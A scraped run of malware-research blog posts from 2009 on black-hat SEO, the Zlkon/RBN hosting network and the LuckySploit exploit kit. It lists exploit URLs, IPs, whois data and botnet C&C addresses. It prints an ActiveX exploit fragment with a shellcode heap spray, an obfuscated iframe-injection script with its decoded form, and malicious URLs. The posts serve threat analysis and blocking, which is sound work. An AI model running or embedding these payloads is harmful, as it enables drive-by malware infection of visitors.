classid='clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9' id='attack'><br /></object><br />");<br />attack.SnapshotPath = arbitrary_file;<br />setTimeout('window.location = "ldap://127.0.0.1"',3000);<br />a<br />ttack.CompressedPath = dest;<br />attack.PrintSnapshot(arbitrary_file,dest);<br />}catch(e){}<br />}<br />function xml()<br />{<br />var spray = unescape("%u0a0a%u0a0a");<br />do { spray += spray; } while(spray.length < 0xd0000);</p><p>memory = new Array();<br />for(i = 0; i < 100; i++){ memory[i] = spray + shellcode; }<br />document.<br />getElementById("xmlplace").innerHTML = "<XML ID=I><X><C><!<br /></p></td></tr></table><br /><table width="437" border="0" cellspacing="0" cellpadding="0"><tr><td width="282" height="31">hxxp://<span class="scam_website">beebest.cn</span>/dlutrl23dnwfas/index.php<br /></td><td width="155"><a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=8c979b2883f0cf92419a4b342fff4545&t=1239946824" target="_blank">URL Analysis</a></td></tr><tr><td height="32" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">beebest.cn</span>/dlutrl23dnwfas/spl/pdf.pdf<br /></td><td style="border-top:solid 1px #CCC"><a href="http://wepawet.cs.ucsb.edu/view.php?hash=07dba62f6c9ddb0e4382026de7b1df26&t=1239981396&type=js">URL Analysis</a></td></tr><tr><td height="39" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">beebest.cn</span>/dlutrl23dnwfas/exe.php<br /></td><td style="border-top:solid 1px #CCC"><a href="http://www.virustotal.com/analisis/e503d8229f7e75c16e93fb24ea0158a9" target="_blank">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1417b1756c1d1e6641d2d1aa0a04cc219&call=first" target="_blank">Anubis</a></td></tr></table><br /><br />A ThreatExpertresult show the connection with stopgam.cn and <br />stopgam2.cn after infection<br /><br /><a href="http://www.threatexpert.com/report.aspx?md5=8f82a4d3271465a32ec888839bdcede0" target="_blank">ThreatExpert Result</a><br /><br /><hr /><br /><br />It's recommended that you block these IPs using your hosts file or your firewall.<br /> <br />These domain are also cited on Malware Domain List: <a href="http://www.malwaredomainlist.com/mdl.php?search=91.212.65.7&colsearch=All&quantity=50" target="_blank">91.212.65.7</a> <br />and all are still active.<br /><br /><table width="294" border="0" cellspacing="0" cellpadding="0"><tr><td height="20">hxxp://<span class="scam_website">beebest.cn</span></td><td>78.109.25.215</td></tr><tr><td height="20" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">clarafin.info</span></td><td style="border-top:solid 1px #CCC">212.5.74.37</td></tr><tr><td height="22" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">corpamata.cn</span><br /></td><td style="border-top:solid 1px #CCC">78.109.25.215</td></tr><tr><td width="164" height="22" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">extraspray.com</span><br /></td><td width="130" style="border-top:solid 1px #CCC">72.232.116.51</td></tr><tr><td height="22" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">agkt.info</span><br /></td><td style="border-top:solid 1px #CCC"> </td></tr><tr><td height="22" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">rifnasax.cn</span></td><td style="border-top:solid 1px #CCC">91.212.65.7</td></tr><tr><td height="22" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">sgqw.info</span></td><td style="border-top:solid 1px #CCC">85.17.136.137</td></tr><tr><td height="18" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">stopgam.cn</span></td><td style="border-top:solid 1px #CCC">85.17.136.137</td></tr><tr><td height="22" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">stopgam2.cn</span></td><td style="border-top:solid 1px #CCC">174.129.244.106<br />174.129.241.185</td></tr></table><br /><br />78.109.25.217<br /><br />IP Location - Namibia - Plathost2 - Ivan Kirst<br /><br />Domain Name: <span class="scam_website">beebest.cn - stopgam.cn - corpamata.cn</span><br />Domain Status: ok<br />Registrant Organization: DomainsC<br />Registrant Name: MichellGregory<br />Administrative Email: abuse@domainsreg.cn<br />Sponsoring Registrar: 厦门华融盛世网络有限公司 - <br />Xiamen Huarong Spirit Network Limited<br />Name Server: ns1.us.editdns.net<br />Name Server: ns2.us.editdns.net<br />Name Server: ns3.us.editdns.net<br />Registration Date: 2009-02-11<br />Expiration Date: 2010-02-11<br /><br />212.5.74.37<br /><br />IP Location - Russia<br /><br />Domain Name: <span class="scam_website">clarafin.info</span><br />Domain Status: ok<br />Billing Organization: XiaMen BizCn Computer & NetWork CO.,Ltd<br />Name Server: ns1.us.editdns.net<br />Name Server: ns2.us.editdns.net<br />Name Server: ns3.us.editdns.net<br />Registration Date: 2009-03-18<br />Expiration Date: 2010-03-18<br /><br />85.17.136.137<br /><br />IP Location - Netherlands - LeaseWeb<br /><br />omain Name: <span class="scam_website">sgqw.info</span> <br />Domain Status: ok<br />Registrant Organization: Private person <br />Registrant Name: Sumir Mahadjan <br />Administrative Email: mahadjans9@gmail.com <br />Sponsoring Registrar: Regtime Ltd. (R455-LRMS)<br />Name Server: ns1.mtpv.info<br />Name Server: ns2.mtpv.info<br />Name Server:ns3.us.editdns.net<br />Registration Date: 2009-04-01<br />Expiration Date: 2010-01-01<br /><br />72.232.116.51 <br /><br />IP Location - US - Layered Technologies, Inc.<br /><br />omain Name: <span class="scam_website">extraspray.com</span><br />Domain Status: ok<br />Registrant Organization: Private person <br />Registrant Name: Sumir Mahadjan<br />Administrative Email: mahadjans9@gmail.com <br />Sponsoring Registrar: Regtime Ltd.<br />Name Server: vc11.amhost.net<br />Name Server: vc12.amhost.net<br />Registration Date: 2009-03-09<br />Expiration Date: 2010-03-09 <br /><br />174.129.244.106<br />174.129.241.185 <br /><br />IP Location - US - Amazon.com, Inc. <br /><br />Domain Name: <span class="scam_website">stopgam2.cn</span><br />ROID: 20090417s10001s12986159-cn <br />Domain Status: clientTransferProhibited <br />Registrant Name: Zitoclick <br />Administrative Email: support@zitoclick.com <br />Sponsoring Registrar: InamePro dba Dynadot <br />Name Server: ns1.dsredirection.com <br />Name Server: ns2.dsredirection.com <br />Registration Date: 2009-04-17 05:23 <br />Expiration Date: 2010-04-17 05:23 <br /><br />91.212.41.119 <br /><br />Domain Name: <span class="scam_website">tixwagoq.cn</span><br />Registrant Organization: 杭州五矿有限公司 - Minmetals Co., Ltd. Hangzhou<br />Registrant Name: 周明 - Zhou<br />Administrative Email: suhalbuia@163.com <br />Sponsoring Registrar: 易名中国 - Easy Chinese<br />Name Server: ns1.runsdns.cn <br />Name Server: ns2.runsdns.cn <br />Registration Date: 2009-03-18 22:16 <br />Expiration Date: 2010-03-18 22:16 <br /><br />inetnum: 91.212.41.0 - 91.212.41.255<br />netname: gaztranzitstroyinfo-net<br />descr: LLC "Gaztransitstroyinfo"<br />country: Russia<br /> ------------<br /><br />91.212.65.7<br /><br />IP Location - Ukraine - Eurohost LLC <br /><br />Domain Name: <span class="scam_website">rifnasax.cn</span><br />Registrant Organization: Yong also Import and Export Corporation<br />Registrant Name: 张龙 - Long<br />Administrative Email: alvin_555@yeah.net <br />Sponsoring Registrar: 易名中国 - Easy Chinese<br />Name Server: ns2.dnsmytruedns.com <br />Name Server: ns1.dnsmytruedns.com <br />Registration Date: 2009-02-13 19:29 <br />Expiration Date: 2010-02-13 19:29 <br /><br />This IP appear to host several websites with live exploits.<br /><br />91.212.65.7 <br /><br /><table width="231" border="0" cellspacing="0" cellpadding="0"><tr><td width="231" height="20">hxxp://<span class="scam_website">dnsmytruedns.com</span><br /> hxxp://<span class="scam_website">hayboxiw.cn </span>(<a href="http://wepawet.cs.ucsb.edu/view.php?hash=d3305cce9ac1c0b1ccfdea16bbebc49a&t=1239984709&type=js" target="_blank">Analysis</a>)<br />hxxp://<span class="scam_website">paksusic.cn</span><br />hxxp://<span class="scam_website">paylayos.cn</span><br />hxxp://<span class="scam_website">peskufex.cn</span><br />hxxp://<span class="scam_website">porgacig.cn</span><br />hxxp://<span class="scam_website">qicdator.cn </span>(<a href="http://wepawet.cs.ucsb.edu/view.php?hash=baca7b81a5ad8bcc70b210847db959c1&t=1238631850&type=js" target="_blank">Analysis</a>)<br />hxxp://<span class="scam_website">ralcofic.cn</span><br />hxxp://<span class="scam_website">rifnasax.cn</span> (<a href="http://wepawet.cs.ucsb.edu/view.php?hash=d52f9efb85ed74924aad6cd64720d575&t=1237274961&type=js" target="_blank">Analysis</a>)<br />hxxp://<span class="scam_website">tozxiqud.cn</span></td></tr></table><br />91.212.41.119<br /><br /><table width="273" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="273" height="20">hxxp://<span class="scam_website">tixwagoq.cn/in.cgi?6</span> (<a href="http://wepawet.cs.ucsb.edu/view.php?hash=ddc1c497688f76469d1f4ffa4f79902f&t=1239621305&type=js" target="_blank">Analysis</a>)<br /></td> </tr></table><br /><br /></td></tr></table></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-55369463301212284662009-04-09T14:38:00.001-07:002009-04-10T08:15:50.371-07:00Black Hat SEO - RBN Hacks, p.2<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="572" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO - Cyber Crime Toolkit Exposed</span><br /><br /> Welcome to LuckySploit:) ITS TOASTED<br /> <br /></p><table width="549" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="549"><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333">THIS page</a> if you need more information<br /></td></tr></table><br /><br /><b>WARNING</b>: All sites listed on this page are dangerous (live URL with exploits) which lead <br />to trojans beeing automatically installed on your computer.<br />Do NOT visit them unless you know what you are doing. <br />(only links are safe)<br /><br /><hr /> <p>A nice article provided by Finjan about the Lucky Sploit toolkit, one of the <br /> latest script kiddies that cyber criminals used these days can be found <br /> following this link: <a href="http://www.finjan.com/MCRCblog.aspx?EntryId=2213" target="_blank">LuckySploit Toolkit Exposed</a><br /><br />Using well known technic such as "<a href="http://www.finjan.com/Content.aspx?id=1456" target="_blank">Code Obfuscation</a>" most often used to <br /> hide its first intention (sometimes randomly generated), here is one of the <br /> numerous malicious script found on several compromised website.<br /></p> <table width="508" height="119" border="1" cellpadding="0" cellspacing="0"><tr><td width="504" height="86" style="padding:15px"><iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><br /><script>function c102916999516l4963660743084(l4963660743855){<br />var l4963660744026=16; return (parseInt(l4963660743855,l4963660744026));}<br />function l4963660744fc7(l4963660745797){<br />function l4963660746f0b(){return 2;}<br />var l4963660745f69='';<br />l4963660747eab=String.fromCharCode;<br />for(l4963660746738=0;l4963660746738<l4963660745797.length;<br />l4963660746738+=l4963660746f0b()){ <br />l4963660745f69+=(l4963660747eab(c102916999516l4963660743084(<br />l4963660745797.substr(l4963660746738,l4963660746f0b()))));}<br />return l4963660745f69;} <br />var x60='';<br />var l4963660748680='3C736'+x60+'3726'+x60+'970743E6'+x60+'96'+x60+'6'+x60<br />+'28216'+x60+'D796'+x60+'96'+x60+'1297B6'+x60+'46'+x60+'F6'+x60+'3756'+x<br />60+'D6'+x60+'56'+x60+'E742E77726'+x60+'9746'+x60+'528756'+x60+'E6'+x60+<br />'5736'+x60+'36'+x60+'1706'+x60+'528202725336'+x60+'32536'+x60+'392536'+<br />x60+'36'+x60+'2537322536'+x60+'312536'+x60+'6'+x60+'42536'+x60+<br />'352532302536'+x60+'6'+x60+'52536'+x60+'312536'+x60+'6'+x60+'42536'+x60+<br />'3525336'+x60+'42536'+x60+'332533312533302532302537332537322536'+x60+<br />'3325336'+x60+'42532372536'+x60+'3825373425373425373025336'+x60+<br />'125326'+x60+'6'+x60+'25326'+x60+'6'+x60+'2536'+x60+'372536'+x60+'6'+<br />x60+'6'+x60+'2536'+x60+'372536'+x60+'6'+x60+'6'+x60+'2533322536'+x60+<br />'6'+x60+'42536'+x60+'3525326'+x60+'52536'+x60+'6'+x60+'52536'+x60+<br />'3525373425326'+x60+'6'+x60+'25326'+x60+'52536'+x60+'372536'+x60+'6'+<br />x60+'6'+x60+'25326'+x60+'6'+x60+'2536'+x60+'332536'+x60+'382536'+x60+<br />'352536'+x60+'332536'+x60+'6'+x60+'225326'+x60+'52536'+x60+'382537342536'+<br />x60+'6'+x60+'42536'+x60+'6'+x60+'32532372532302537372536'+x60+'392536'+<br />x60+'342537342536'+x60+'3825336'+x60+'42533332533342533392532302536'+<br />x60+'382536'+x60+'352536'+x60+'392536'+x60+'372536'+x60+'3825373425336'+<br />x60+'42533352533352533372532302537332537342537392536'+x60+'6'+x60+<br />'32536'+x60+'3525336'+x60+'4253237253736'+x60+'2536'+x60+'392537332536'+<br />x60+'392536'+x60+'322536'+x60+'392536'+x60+'6'+x60+'32536'+x60+<br />'3925373425373925336'+x60+'12536'+x60+'382536'+x60+'392536'+x60+'342536'+<br />x60+'342536'+x60+'352536'+x60+'6'+x60+'525323725336'+x60+'525336'+x60+<br />'325326'+x60+'6'+x60+'2536'+x60+'392536'+x60+'36'+x60+'2537322536'+x60+<br />'312536'+x60+'6'+x60+'42536'+x60+'3525336'+x60+'52729293B7D76'+x60+'6'+<br />x60+'172206'+x60+'D796'+x60+'96'+x60+'13D7472756'+x60+'53B3C2F736'+x60+<br />'3726'+x60+'970743E';alert(l4963660744fc7(l4963660748680));<br /></script> </td></tr> </table> <br /> The deobfuscated result is:<br /> <br /> <table width="513" height="119" border="1" cellpadding="0" cellspacing="0"><tr><td width="509" height="86" style="padding:15px"><script><br />if(!myia){document.write(unescape('%3c%69%66%72%61%6d%65%20%6e<br />%61%6d%65%3d%63%31%30%20%73%72%63%3d%27%68%74%74%70%3a%<br />2f%2f%67%6f%67%6f%32%6d%65%2e%6e%65%74%2f%2e%67%6f%2f%63%<br />68%65%63%6b%2e%68%74%6d%6c%27%20%77%69%64%74%68%3d%33%<br />34%39%20%68%65%69%67%68%74%3d%35%35%37%20%73%74%79%6c%<br />65%3d%27%76%69%73%69%62%69%6c%69%74%79%3a%68%69%64%64%<br />65%6e%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}<br />var myia=true;<br /></script></td></tr> </table> <br />
and then load the IFRAME.<br /><br /> <table width="460" height="63" border="1" cellpadding="0" cellspacing="0"><tr><td width="499" height="61" style="padding:15px"><iframe name=c10 src='hxxp://gogo2me.net/.go/check.html' width=349 height=557 style='visibility:hidden'></iframe></td></tr> </table> <p>Note that the script found in the second redirection show a lot of chat which refer <br /> different IPs or hacking problems (IFRAME injected) <a href="http://www.google.com/search?hl=en&q="if(!myia)"%20iframe" target="_blank">Google search for "if(!myia)" iframe </a><br /><br /><br />An example of site on the same IP:<br /><br /><span style="padding:15px">gogo2me.net</span>resolve to <span style="padding:15px">94.247.2.157 [hs.2-157.zlkon.lv]<br /><br /> and then load an IFRAME (with the LuckySpoit)<br /></span></p> <table width="536" height="63" border="1" cellpadding="0" cellspacing="0"><tr><td width="532" height="61" style="padding:15px">hxxp://94.247.2.157/.dif/go.php?sid=1<br />hxxp://94.247.2.157/.lck/?t=3<br />hxxp://94.247.2.157/.lck/?t=6 <br />http://94.247.2.157/.lck/?90f6ff8e287ae123...<br />http://94.247.2.157/.lck/?75c4a0ecf4a4836...</td></tr> </table> <p><a href="http://wepawet.iseclab.org/view.php?hash=53e2d900bba11fc1f78c011fbb8413f6&t=1232989747&type=js" target="_blank">Wepawet Analysis</a><br /><br />
A <a href="http://www.threatexpert.com/report.aspx?md5=8ac678d117c5ce0970f52903f8a610b0">ThreatExpert analysis</a> also indicate the relationship with these viruses/malware:<br /><br />Zlob variant (<a href="http://www.threatexpert.com/threats/trojan-spy-win32-zbot.html">Trojan-Spy.Win32.Zbot</a>), keylogger's trojan (<a href="http://www.threatexpert.com/threats/trojan-spy-zbot-yeth.html">Trojan-Spy.Zbot.YETH</a>) and some<br />TDSS (Alias Alureon) variant <a href="http://www.threatexpert.com/threats/virus-win32-fasec.html">Win32.Fasec [Ikarus]</a><br /><a href="http://www.threatexpert.com/threats/virus-win32-fasec.html"></a><br /><br /> And here I just show you the line :) Also note the use of RSA algorithm (screenshot)<br /></p> <table width="333" height="119" border="1" cellpadding="0" cellspacing="0"><tr><td width="329" height="86" style="padding:15px">nextkey = ''; <br />k = '';<br />attack_level = 0;<br />try {<br />f = '<b>Welcome to LuckySploit:) \n ITS TOASTED</b>';<br />} catch (e){<br />} </td></tr> </table> <br /> <p> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ-z0OCUTjUNuVDTlQXkL-W5tNBj_97bV7ZcmNDEIlLHy70OjJAtyVx9j7Im_am3Xj72zOPZKYQkwwLgZL4KXSw1THEVuEj43UVddA3uj0Us4dr6Q0fPDx84XoNO_cBDWzrueaQFBvO5gO/s1600-h/rsa-lucky-powned.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 226px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ-z0OCUTjUNuVDTlQXkL-W5tNBj_97bV7ZcmNDEIlLHy70OjJAtyVx9j7Im_am3Xj72zOPZKYQkwwLgZL4KXSw1THEVuEj43UVddA3uj0Us4dr6Q0fPDx84XoNO_cBDWzrueaQFBvO5gO/s320/rsa-lucky-powned.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5321891299924447362" /></a><br /><br /><br /><br /><br /><br /><br /> </p></td></tr><tr><td> </td></tr> </table></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-53896671711279753732009-04-09T14:34:00.000-07:002009-04-19T11:51:12.722-07:00Black Hat SEO - RBN Hacks, p.1<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="572" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO, exploits, hacks, botnets</span><br /><br />Inspecting the bad network <br /></p><table width="543" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="543"><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333">THIS page</a> if you need more information<br /></td></tr></table><p><b>WARNING</b>: All sites listed on this page are dangerous (live URL with exploits) <br /> which lead to trojans beeing automatically installed on your computer.<br />Do NOT visit them unless you know what you are doing. <br />(only links are safe)<br /><br /><hr /><p>If you want information about desinfection check out this page:<br /> <a href="http://novirusthanks.org/blog/2009/03/analysis-of-a-website-infected-with-a-hidden-iframe/" target="_blank">Analysis of a website infected with a hidden iframe</a> (by NoVirusThanks)<br /> <br />This doesn't include the desinfection of your website (attacked - iframed).<br /> <br />For this change your passwords (windows passwords, FTP, emails, database <br />access etc.) and remove the content injected on each page as quickly as possible<br />(contact your hosting provider for assistance).<br /><br />This page reference domain found in thousand of compromised websites using<br />obfuscated javascript code injected (IFRAME).<br /><br /><hr />The Zlkon network (DATORU EXPRESS SERVISS) has been cited in several blogs <br /> for hosting malicious content for cyber criminals - for example:<br /><br />On Symantec website for spreading the <a href="http://www.symantec.com/en/us/security_response/writeup.jsp?docid=2008-121016-4048-99&tabid=2" target="_blank">TDSS trojan</a> [hs.2-104.zlkon.lv] - in conjunction <br />with IPs at UkrTeleGroup Ltd.in December 2008<br /><br />85.255.115.156<br />85.255.112.87<br />85.255.115.50<br />85.255.112.154<br /><br />On the <a href="http://msmvps.com/blogs/spywaresucks/archive/2009/01/21/1663955.aspx" target="_blank">msmvps' blog</a> for inaccurate whois details in January 2009<br />On bluetack.co.uk forum for rogue antivirus <a href="http://www.bluetack.co.uk/forums/index.php?showtopic=18064&st=210&p=90509&" target="_blank">here</a> in January 2009<br />Another example with "<a href="http://www.raymond.cc/forum/spyware-viruses/9785-new-rogue-antivirus.html" target="_blank">Total Defender</a>", other rogue antivirus <a href="http://realsecurity.wordpress.com/2008/12/15/sources-of-badness-zlkon/" target="_blank">here</a><br />Also found on several websites including fireeye "<a href="http://blog.fireeye.com/research/2009/02/bad-actors-part-2-zlkon.html" target="_blank">Bad Actors Part 2 - ZlKon</a>" <br /> - <a href="http://ddanchev.blogspot.com/search?q=zlkon" target="_blank">dancho danchev's blog</a> <br /> Network in conjunction cited here: <a href="http://blogs.zdnet.com/security/?p=2764" target="_blank"> Bad, bad, cybercrime-friendly ISPs!</a><br /><br /><br /><hr /><br />A quick look at two IPs at Zlkon in Latvia <br /><br /><br />94.247.3.152 [hs.3-152.zlkon.lv]<br /><br />Using the dns <br /><br />ns1.freednshostserver.com [78.109.18.234]<br />ns1.freednshostserver.com [78.109.18.235] <br /><br />descr: Datacenter Hosting.UA<br />route: 78.109.16.0/20 <br />origin: AS41665<br /><br />we have these domain currently live and kicking a lot of websites <br />(simply enter a domain or "<span class="trojans_luckysploit">in.cgi?cocacola</span>" in google reveal a lot of chat related to <br />hacked domain iframed.)<br /><br /></p><table width="431" border="0" cellspacing="0" cellpadding="0"><tr> <td><span class="trojans_luckysploit">betstarwager.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=bbe9cd33895ddb68493a16f62350b287&t=1239052803&type=js" target="_blank">Analysis</a></td></tr><tr> <td width="266"><span class="trojans_luckysploit">bestlotron.cn/in.cgi?cocacola</span></td> <td width="165"><a href="http://wepawet.iseclab.org/view.php?hash=60a1b098ebbd8a0a856e90100d9244e3&t=1239052609&type=js" target="_blank">Analysis</a></td> </tr><tr> <td><span class="trojans_luckysploit">denverfilmdigitalmedia.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=16d7159bfd0d418d6e06ab65f7d8d790&t=1239052806&type=js" target="_blank">Analysis</a></td> </tr><tr> <td><span class="trojans_luckysploit">diettopseek.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=44eb05a65e07e2b4a6a1b62fa7223e14&t=1239052811&type=js" target="_blank">Analysis</a></td></tr><tr> <td><span class="trojans_luckysploit">filmlifemusicsite.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=e51f24301e2dfd7f50345f7e34a43542&t=1239240102&type=js" target="_blank">Analysis</a></td> </tr><tr> <td><span class="trojans_luckysploit">filmlifemusicsite.cn</span>/</td> <td><a href="http://wepawet.iseclab.org/view.php?hash=bbdcccf14f5edd00a9ad9c5a38bcd405&t=1237403830&type=js" target="_blank">Analysis</a></td></tr><tr> <td><span class="trojans_luckysploit">filmtypemedia.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=d105fe8dbf2312a2acb0758753641453&t=1237293959&type=js" target="_blank">Analysis</a></td> </tr><tr> <td><span class="trojans_luckysploit">litedownloadseek.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=ac0f1c55cfee34869d00133fddf7be6c&t=1239052790&type=js" target="_blank">Analysis</a></td></tr><tr> <td><span class="trojans_luckysploit">litetopfindworld.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=5b0a23d369d4e147ef587d57a1502a53&t=1239052785&type=js" target="_blank">Analysis</a></td> </tr><tr> <td><span class="trojans_luckysploit">litetoplocatesite.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=d881cfdc9c2ff0ed01417d02b5ca099f&t=1239052789&type=js" target="_blank">Analysis</a></td> </tr><tr> <td><span class="trojans_luckysploit">nanotopfind.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=ca10a92f348cc68315b5a77b61e6325a&t=1239052787&type=js" target="_blank">Analysis</a></td> </tr><tr> <td><span class="trojans_luckysploit">promixgroup.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=9dd3221d3789cb6adc758610a48ebb5a&t=1239052802&type=js" target="_blank">Analysis</a></td> </tr><tr> <td><span class="trojans_luckysploit">yourliteseek.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=2587c7959e1726de2ba36e2988c1a74d&t=1239052792&type=js" target="_blank">Analysis</a></td> </tr><tr> <td> </td> <td> </td></tr><tr> <td><span class="trojans_luckysploit">ghrgt.hostindianet.com/index.php</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=bbe9cd33895ddb68493a16f62350b287&t=1239052803&type=js" target="_blank">Analysis</a></td></tr><tr> <td><span class="trojans_luckysploit">lieliteautobody.cn/load.php?id=4<br />[94.247.3.151] </span></td> <td><a href="http://anubis.iseclab.org/?action=result&task_id=16e978b65ea02b6641566b279bd76918a" target="_blank">Anubis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=16e978b65ea02b6641566b279bd76918a" target="_blank">VirusTotal</a><br />
Botnet C&C: 213.155.4.82<br /><a href="http://anubis.iseclab.org/index.php?action=show_cluster&cluster_id=1175580">Anubis Family 1175580</a><br /></td> </tr><tr> <td> </td> <td> </td></tr><tr> <td><span class="trojans_luckysploit">ghrgt.hostindianet.com/cache/readme.pdf</span></td> <td><a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=53174ae137690fab4987e35ad66c6989&t=1237602362" target="_blank">Analysis</a></td></tr><tr> <td><span class="trojans_luckysploit">zzzz.hostindianet.com/load.php?id=4</span></td> <td><a href="http://anubis.iseclab.org/?action=result&task_id=17853954c8943ac946177e41ebe0e066b" target="_blank">Anubis</a> - <a href="http://www.virustotal.com/analisis/385099e73f02b35dfe596adb177f0524" target="_blank">VirusTotal</a> <br />Botnet C&C: <br />213.155.4.80<br />78.109.30.224</td></tr><tr> <td> </td> <td> </td></tr><tr> <td height="80" colspan="2"><br />Also cited on Dancho Danchv's blog <a href="http://ddanchev.blogspot.com/2009/03/azerbaijanian-embassies-in-pakistan-and.html" target="_blank">here</a> in the serie of embassies websites iframed. (11 of them - including hostindianet[.]com) <a href="http://wepawet.iseclab.org/view.php?hash=100c37951c22d9a6e2b22a10f802b65c&t=1236822958&type=js"><br /></a></td> </tr></table><br /><br /><br /><br /><hr />
On the next IP:<br /><br />94.247.3.151 [hs.3-152.zlkon.lv]<br /><br /><table width="512" border="1" cellspacing="0" cellpadding="0" bordercolor="#CCCCCC"><tr> <td><span class="trojan">hxxp://bigtopescorts.cn/in.cgi?id1000 (dead)</span></td> <td width="276"> </td></tr><tr> <td height="86">hxxp://cheapslotplay.cn/in.cgi?income48</td> <td>Redirect to exploit<br />hxxp://hyperliteautoservices.cn/index.php (dead)<br />but the trojan is still available on<br />hyperliteautoservices.cn/load.php <br /><a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis</a></td> </tr><tr> <td>hxxp://daddybigtop.cn<a href="http://wepawet.iseclab.org/view.php?hash=ef3063188a85f075510764cdd4f37d9e&t=1239059094&type=js" target="_blank"><br /> </a></td> <td>Load trojan on<br />hxxp://freeonlinehostguide.com/load.php<br /><a href="http://www.virustotal.com/analisis/0f7fb579481d87a965698099c36d70a4">VirusTotal</a> - <a href="http://wepawet.iseclab.org/view.php?hash=ef3063188a85f075510764cdd4f37d9e&t=1239059094&type=js" target="_blank">Redirection Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1552cc1212a74b88461563200051fe3b5" target="_blank">Anubis</a><br />Detection: <br />Trojan-Downloader.Win32.Bredolab!IK <br />TR/Crypt.ZPACK.Gen <br />Trojan-Downloader.Win32.Bredolab<br />Trojan:Win32/Meredrop <br /><br />Using a stack overflow in adobe reader 8.1.2 <br /><a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-2992" target="_blank">CVE-2008-2992</a></td> </tr><tr> <td height="26">hxxp://educationbigtop.cn</td> <td><a href="http://www.virustotal.com/analisis/0f7fb579481d87a965698099c36d70a4" target="_blank">VirusTotal Report</a> (Brebolab)</td></tr><tr> <td><span class="trojan">hxxp://freehostinternet.com</span></td> <td>Load trojan on<br />hxxp://daddybigtop.cn/load.php<br /><a href="http://www.virustotal.com/analisis/2204575b3999d57b3bfc3e83f43fcd6e">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=137aa20f0f4fcbc34e5ba23aedef48abb" target="_blank">Anubis</a><br />Detection: <br />Trojan-Downloader.Win32.Bredolab<br /> <br /> Connect to botnet: 213.155.6.33<br /></td></tr><tr> <td width="230" height="206"><span class="trojans_luckysploit">hxxp://freeonlinehostguide.com/<br />index.php</span></td> <td>Load trojan on<br 